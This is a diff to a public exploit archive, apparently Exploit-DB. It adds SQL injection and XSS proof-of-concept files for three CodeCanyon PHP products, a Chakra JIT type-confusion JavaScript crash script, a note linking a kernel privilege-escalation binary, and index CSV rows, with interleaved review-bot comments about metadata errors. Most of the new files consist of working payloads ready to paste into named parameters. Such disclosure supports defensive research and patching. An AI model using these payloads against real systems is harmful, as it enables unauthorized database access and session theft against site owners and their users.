@@ -0,0 +1,22 @@ +# Exploit Title: Feedy RSS News Ticker 2.0 - 'cat' SQL Injection +# Dork: N/A +# Date: 2018-05-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/feedy-rss-news-ticker/5818277 +# Version: 2.0 +# Category: Webapps +# Tested on: Kali linux + +# PoC: SQLi: +# Parameter: cat +# Type: boolean-based blind +# Demo: http://target/feedy/category.php?cat= +# Payload: + +cat=akkus+keyney' AND 2367=2367 AND 'NKyC'='NKyC + +# Type: AND/OR time-based blind +# Demo: http://demo.cudevo.com/feedy/category.php?cat=1 +# Payload: + +cat=akkus+keyney' AND SLEEP(5) AND 'AEHg'='AEHg \ No newline at end of file diff --git a/exploits/php/webapps/44702.txt b/exploits/php/webapps/44702.txt new file mode 100644 index 000000000..543633c63 --- /dev/null +++ b/exploits/php/webapps/44702.txt 
@@ -0,0 +1,62 @@ +# Exploit Title: NewsBee CMS 1.4 - 'download.php' SQL Injection +# Dork: N/A +# Date: 2018-05-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 +# Version: 1.4 / fourth update +# Category: Webapps +# Tested on: Kali linux + +# PoC: SQLi: +# Parameter: id +# Type: boolean-based blind +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=578' AND 2043=2043 AND 'KzTm'='KzTm&t=gallery + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: + +id=578' AND (SELECT 7126 FROM(SELECT +COUNT(*),CONCAT(0x7162787871,(SELECT +(ELT(7126=7126,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hOBA'='hOBA&t=gallery + +# Type: AND/OR time-based blind +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=578' AND SLEEP(5) AND 'KlSV'='KlSV&t=gallery + +# Type: UNION query +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=-1714' UNION ALL SELECT +NULL,NULL,CONCAT(0x7162787871,0x51487655536a566c616e5156496a6a56426267495670596f644f466f554753504469636d4358694c,0x71766a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- +WSZd&t=gallery + +# PoC: SQLi: +# Parameter: t +# Type: boolean-based blind +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=578&t=gallery` WHERE 7854=7854 AND 1059=1059# + +# Type: error-based +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=578&t=gallery` WHERE 8962=8962 AND (SELECT 1892 FROM(SELECT +COUNT(*),CONCAT(0x7162787871,(SELECT +(ELT(1892=1892,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eLUC + +# Type: AND/OR time-based blind +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + 
+id=578&t=gallery` WHERE 5549=5549 AND SLEEP(5)-- RUaY \ No newline at end of file diff --git a/exploits/php/webapps/44703.txt b/exploits/php/webapps/44703.txt new file mode 100644 index 000000000..1bf65ac99 --- /dev/null +++ b/exploits/php/webapps/44703.txt @@ -0,0 +1,48 @@ +# Exploit Title: Easy File Uploader 1.7 - SQL Injection / Cross-Site +Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287 +# Version: 1.4 / fourth update +# Category: Webapps +# Tested on: Kali linux +# Description : Non-authorized users can perform the attack in the editing +area. +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/EasyFileUploader/settings-users-edit.php?id=1 + Payload : id=1' RLIKE (SELECT (CASE WHEN (7769=7769) THEN 27 ELSE 0x28 +END))-- wKWi + + Type : error-based + Payload : id=1' AND (SELECT 6379 FROM(SELECT +COUNT(*),CONCAT(0x717a627671,(SELECT +(ELT(6379=6379,1))),0x7178707071,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ATeG + + Type : AND/OR time-based blind + Demo : +http://test.com/EasyFileUploader/settings-users-edit.php?id=1 + Payload : id=1' AND SLEEP(5)-- gTLZ + + Type : UNION query + Demo : +http://test.com/EasyFileUploader/settings-users-edit.php?id=1 + Payload : id=-3300' UNION ALL SELECT +NULL,NULL,CONCAT(0x717a627671,0x79556745594846426c69514d71737744775a6450464a5963786658766171476f447a79684675714a,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL# + + +==================================================== + +# PoC : XSS : + + Payload : +http://test.com/EasyFileUploader/settings-users-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98 +; \ No newline at end of file 
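Review bot: In 44703.txt the title says Easy File Uploader 1.7 but the `# Version:` header reads `1.4 / fourth update`, the exact value used in the NewsBee entries by the same author in this commit, so one of them is a paste error and the affected version is ambiguous for anyone triaging. The `# Description` line says unauthenticated users can reach the editing area (`settings-users-edit.php`); that missing access control is a finding in its own right and deserves a mention in the title or CSV description, since fixing the injection alone would leave it.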
diff --git a/exploits/windows/dos/44694.js b/exploits/windows/dos/44694.js
new file mode 100644
index 000000000..2676ff561
--- /dev/null
+++ b/exploits/windows/dos/44694.js
@@ -0,0 +1,33 @@
+/*
+BOOL JavascriptNativeFloatArray::SetItem(uint32 index, double dValue)
+{
+ if (*(uint64*)&dValue == *(uint64*)&JavascriptNativeFloatArray::MissingItem)
+ {
+ JavascriptArray *varArr = JavascriptNativeFloatArray::ToVarArray(this);
+ varArr->DirectSetItemAt(index, JavascriptNumber::ToVarNoCheck(dValue, GetScriptContext()));
+ return TRUE;
+ }
+
+ this->DirectSetItemAt(index, dValue);
+ return TRUE;
+}
+
+As you can see above, if the double value given as the parameter equals to JavascriptNativeFloatArray::MissingItem, it converts the float array to a var array. Since the input value is not checked in the JITed code, it can lead to type confusion.
+*/
+
+function opt(arr, value) {
+ arr[1] = value;
+ arr[0] = 2.3023e-320;
+}
+
+function main() {
+ for (let i = 0; i < 0x10000; i++)
+ opt([1.1], 2.2);
+
+ let arr = [1.1];
+ opt(arr, -5.3049894784e-314); // MAGIC VALUE!
+
+ print(arr);
+}
+
+main();
\ No newline at end of file
diff --git a/exploits/windows/local/44697.txt b/exploits/windows/local/44697.txt
new file mode 100644
index 000000000..07e64ee61
--- /dev/null
+++ b/exploits/windows/local/44697.txt
@@ -0,0 +1,7 @@
+Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.
+
+- KVA Shadowing should be disabled and the relevant security update should be uninstalled.
+- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1f7035a83..70e094804
--- a/files_exploits.csv
+++ b/files_exploits.csv
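Review bot: 44694.js never states which host it is written for or what a successful run looks like: `print` is not a browser global, and the 0x10000-iteration warm-up of `opt` only has an effect if the host JIT-compiles the function, so a reader cannot tell a reproduction from a no-op. A header comment would make the entry self-describing, e.g. `// Host: a JS shell exposing print(); expected observable: <describe crash or output here>`. The quoted `SetItem` snippet is not tied to a Chakra version or commit, and the `Microsoft Edge` title does not pin one either; recording it would let defenders check whether a given build is affected.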
@@ -5974,6 +5974,9 @@ id,file,description,date,author,type,platform,port
 44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios,
 44641,exploits/linux/dos/44641.c,"Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall",2018-05-17,"Google Security Research",dos,linux,
 44653,exploits/windows/dos/44653.js,"Microsoft Edge Chakra JIT - Bound Check Elimination Bug",2018-05-18,"Google Security Research",dos,windows,
+44693,exploits/linux/dos/44693.py,"Siemens SIMATIC S7-1500 CPU - Remote Denial of Service",2018-05-22,t4rkd3vilz,dos,linux,
+44694,exploits/windows/dos/44694.js,"Microsoft Edge Chakra JIT - Magic Value Type Confusion",2018-05-22,"Google Security Research",dos,windows,
+44695,exploits/hardware/dos/44695.c,"AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass",2018-05-22,"Google Security Research",dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9724,6 +9727,10 @@ id,file,description,date,author,type,platform,port
 44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows,
 44677,exploits/linux/local/44677.rb,"Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)",2018-05-21,Metasploit,local,linux,
 44680,exploits/windows_x86/local/44680.py,"R 3.4.4 - Local Buffer Overflow (DEP Bypass)",2018-05-21,"Hashim Jawad",local,windows_x86,
+44688,exploits/linux/local/44688.txt,"Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read",2018-05-22,"Paul Taylor",local,linux,
+44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android,
+44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux,
+44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39330,7 +39337,8 @@ id,file,description,date,author,type,platform,port
 44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php,
 44625,exploits/php/webapps/44625.txt,"VirtueMart 3.1.14 - Persistent Cross-Site Scripting",2018-05-16,"Mattia Furlani",webapps,php,
 44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows,
-44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting",2018-05-16,L0RD,webapps,php,
+44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting",2018-05-16,L0RD,webapps,php,
+44685,exploits/php/webapps/44685.txt,"Zechat 1.5 - SQL Injection / Cross-Site Request Forgery",2018-05-22,L0RD,webapps,php,
 44628,exploits/linux/webapps/44628.txt,"Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery",2018-05-16,L0RD,webapps,linux,
 44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp,
 44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80
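Review bot: The new `44685` row is inserted between `44627` and `44628` rather than after the highest id of the webapps group, which is where every other new row in this commit lands (`44693`–`44695` after `44653`, `44688`–`44697` after `44680`); tooling that assumes per-type id order will mis-sort it, so the row should move to the end of the group. Its description, `Zechat 1.5 - SQL Injection / Cross-Site Request Forgery`, also drops the `'hashtag' / 'v'` parameter names that the file's own title carries, and the CSV is what search hits, so keeping the two in step helps anyone looking for the affected endpoint.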
@@ -39339,7 +39347,7 @@ id,file,description,date,author,type,platform,port
 44637,exploits/hardware/webapps/44637.py,"Intelbras NCLOUD 300 1.0 - Authentication bypass",2018-05-17,"Pedro Aguiar",webapps,hardware,
 44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php,
 44640,exploits/linux/webapps/44640.txt,"Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery",2018-05-17,t4rkd3vilz,webapps,linux,
-44645,exploits/php/webapps/44645.txt,"Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
+44645,exploits/php/webapps/44645.txt,"Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
 44646,exploits/php/webapps/44646.txt,"Monstra CMS before 3.0.4 - Cross-Site Scripting",2018-05-18,"Berk Dusunur",webapps,php,
 44647,exploits/linux/webapps/44647.txt,"SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure",2018-05-18,"Richard Alviarez",webapps,linux,
 44651,exploits/php/webapps/44651.txt,"Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php,
@@ -39348,18 +39356,30 @@ id,file,description,date,author,type,platform,port
 44657,exploits/hardware/webapps/44657.txt,"D-Link DSL-3782 - Authentication Bypass",2018-05-20,"Giulio Comi",webapps,hardware,
 44661,exploits/php/webapps/44661.txt,"Superfood 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
 44660,exploits/php/webapps/44660.txt,"Joomla! Component EkRishta 2.10 - Cross-Site Scripting / SQL Injection",2018-05-20,"Sina Kheirkhah",webapps,php,
-44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
-44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php,
+44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
+44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php,
 44664,exploits/php/webapps/44664.txt,"Zenar Content Management System - Cross-Site Scripting",2018-05-21,"Berk Dusunur",webapps,php,
 44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,
-44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java,
+44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java,
 44667,exploits/linux/webapps/44667.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,linux,
 44671,exploits/hardware/webapps/44671.html,"Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
 44672,exploits/hardware/webapps/44672.txt,"Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
 44675,exploits/hardware/webapps/44675.html,"Teradek Cube 7.3.6 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
 44676,exploits/hardware/webapps/44676.html,"Teradek Slice 7.3.15 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware,
 44678,exploits/windows/webapps/44678.txt,"Schneider Electric PLCs - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,windows,
-44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass",2018-05-21,L0RD,webapps,php,
+44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
 44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,
-44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass",2018-05-21,L0RD,webapps,php,
-44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
+44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
+44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
+44684,exploits/hardware/webapps/44684.txt,"Nordex N149/4.0-4.5 - SQL Injection",2018-05-22,t4rkd3vilz,webapps,hardware,
+44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,
+44687,exploits/linux/webapps/44687.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting",2018-05-22,t4rkd3vilz,webapps,linux,
+44689,exploits/php/webapps/44689.txt,"PaulPrinting CMS Printing 1.0 - SQL Injection",2018-05-22,"Mehmet Onder",webapps,php,
+44692,exploits/php/webapps/44692.txt,"iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-22,L0RD,webapps,php,
+44691,exploits/java/webapps/44691.txt,"ERPnext 11 - Cross-Site Scripting",2018-05-22,"Veerababu Penugonda",webapps,java,
+44698,exploits/linux/webapps/44698.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,linux,
+44699,exploits/php/webapps/44699.txt,"Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting",2018-05-22,L0RD,webapps,php,
+44700,exploits/php/webapps/44700.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,php,
+44701,exploits/php/webapps/44701.txt,"Feedy RSS News Ticker 2.0 - 'cat' SQL Injection",2018-05-22,AkkuS,webapps,php,
+44702,exploits/php/webapps/44702.txt,"NewsBee CMS 1.4 - 'download.php' SQL Injection",2018-05-22,AkkuS,webapps,php,
+44703,exploits/php/webapps/44703.txt,"Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting",2018-05-22,AkkuS,webapps,php,
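Review bot: The added 44698 and 44700 rows are almost certainly a duplicate filing: identical description `"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection"`, identical author and date, differing only in id, file path and platform (`linux` versus `php`). Two ids for one advisory inflate the index and make platform-based searches return the same issue twice, so one of the rows should be dropped, or, if the two text files really describe different injection points, the description of at least one should name the distinguishing parameter as the neighbouring `44701` "'cat'" entry does. The new 44687 SIMATIC S7-1200 row is tagged `linux`, while the 44684 Nordex turbine row added in the same hunk and the existing Teradek entries use `hardware`; the PLC rows do not look consistently classified and I would confirm which platform tag is intended for embedded web interfaces. 44692 is also inserted before 44691, so the appended rows are not in id order.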